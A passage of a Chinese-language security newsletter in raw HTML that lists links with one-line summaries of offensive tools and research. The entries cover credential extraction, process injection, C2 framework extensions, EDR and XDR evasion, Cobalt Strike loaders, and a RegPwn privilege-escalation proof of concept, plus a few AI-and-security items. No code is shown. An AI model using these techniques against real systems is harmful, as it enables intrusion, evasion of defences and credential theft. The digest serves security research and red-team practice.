flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内网渗透</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">tdo_dump：介绍单向信任关系的安全风险及新工具，揭示信任域管理员可横向移动到被信任域的技术原理</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://offsec.almond.consulting/trust-no-one_are-one-way-trusts-really-one-way.html" target="_blank">https://offsec.almond.consulting/trust-no-one_are-one-way-trusts-really-one-way.html</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Outpacket：将常见impacket工作流映射到现代替代方案的速查表项目</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/n00py/Outpacket" target="_blank">https://github.com/n00py/Outpacket</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">VMkatz：面向虚拟化环境的凭证提取工具，用于从虚拟机内存或相关组件中获取敏感认证信息</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/nikaiw/VMkatz" target="_blank">https://github.com/nikaiw/VMkatz</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">终端对抗</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍使用Rust实现早期级联注入技术，针对NTDLL进行攻击的技术文章</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://fluxsec.red/implementing-early-cascade-injection-rust" target="_blank">https://fluxsec.red/implementing-early-cascade-injection-rust</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍如何通过Python模块扩展Conquest C2框架以创建自定义命令</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://jakobfriedl.github.io/blog/conquest-modules/" target="_blank">https://jakobfriedl.github.io/blog/conquest-modules/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析Palo Alto Cortex XDR中预定义BIOC规则的解密与滥用方法，探讨EDR规则触发机制</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.infoguard.ch/posts/decrypting-and-abusing_paloalto-cortex-xdr_behavioral-rules_biocs/" target="_blank">https://labs.infoguard.ch/posts/decrypting-and-abusing_paloalto-cortex-xdr_behavioral-rules_biocs/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Phantom：一个在IIS环境中内存加载执行.NET程序集的项目，使用反射加载技术注入DLL到w3wp.exe进程</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/zux0x3a/Phantom" target="_blank">https://github.com/zux0x3a/Phantom</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">BYOUD：一个用于Windows x64堆栈欺骗的框架，通过操纵展开元数据来隐藏调用链中的任意部分，以对抗调试器和EDR检测</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/klezVirus/BYOUD" target="_blank">https://github.com/klezVirus/BYOUD</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">doublepulsar-rs：Rust语言实现的DoublePulsar反射加载器，用于Cobalt Strike UDRL功能</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/memN0ps/doublepulsar-rs" target="_blank">https://github.com/memN0ps/doublepulsar-rs</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">armory-rs：一个Rust编写的Beacon Object Files (BOFs)项目，将115个TrustedSec BOFs从C语言移植到Rust，用于对抗模拟、威胁仿真和安全研究</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/memN0ps/armory-rs" target="_blank">https://github.com/memN0ps/armory-rs</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AdaptixC2模板生成器，为AdaptixC2扩展开发提供独立的脚手架工具包</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/AeonDave/AdaptixC2-Template-Generators" target="_blank">https://github.com/AeonDave/AdaptixC2-Template-Generators</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Fritter：一个专注于规避和签名抵抗的shellcode生成器，支持VBScript、JScript、EXE、DLL和.NET程序集的内存执行</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/0xROOTPLS/Fritter" target="_blank">https://github.com/0xROOTPLS/Fritter</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞相关</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-24291：实战中被大量使用并命名为RegPwn的提权漏洞被修复，POC披露</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.mdsec.co.uk/2026/03/rip-regpwn/" target="_blank">https://www.mdsec.co.uk/2026/03/rip-regpwn/</a></span></p></div><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/mdsecactivebreach/RegPwn" target="_blank">https://github.com/mdsecactivebreach/RegPwn</a></span></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RegPwnBOF：Cobalt Strike BOF版本的RegPwn漏洞利用工具，用于权限提升</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Flangvik/RegPwnBOF" target="_blank">https://github.com/Flangvik/RegPwnBOF</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍PageJack技术对CVE-2022-0995漏洞的利用方法，包含PoC演示</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.quarkslab.com/pagejack-in-action-cve-2022-0995-exploit.html" target="_blank">https://blog.quarkslab.com/pagejack-in-action-cve-2022-0995-exploit.html</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GNU Inetutils telnetd存在远程预认证缓冲区溢出漏洞，需要ASLR绕过，主要影响嵌入式设备</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://lists.gnu.org/archive/html/bug-inetutils/2026-03/msg00031.html" target="_blank">https://lists.gnu.org/archive/html/bug-inetutils/2026-03/msg00031.html</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">llmchainhunter：使用Claude Code搜索Java反序列化利用链的设计方案和操作手册</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/atredispartners/llmchainhunter" target="_blank">https://github.com/atredispartners/llmchainhunter</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Datadog团队分享如何检测并阻止针对其开源仓库的AI恶意贡献，提供开源仓库和GitHub Actions加固建议</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.datadoghq.com/blog/engineering/stopping-hackerbot-claw-with-bewaire" target="_blank">https://www.datadoghq.com/blog/engineering/stopping-hackerbot-claw-with-bewaire</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍Cursor公司使用自主代理进行代码安全审查，通过LLM检测并防止安全漏洞进入生产环境</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://cursor.com/blog/security-agents" target="_blank">https://cursor.com/blog/security-agents</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenAI解释Codex Security工具为何不包含SAST报告，涉及AI安全工具的设计理念</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a 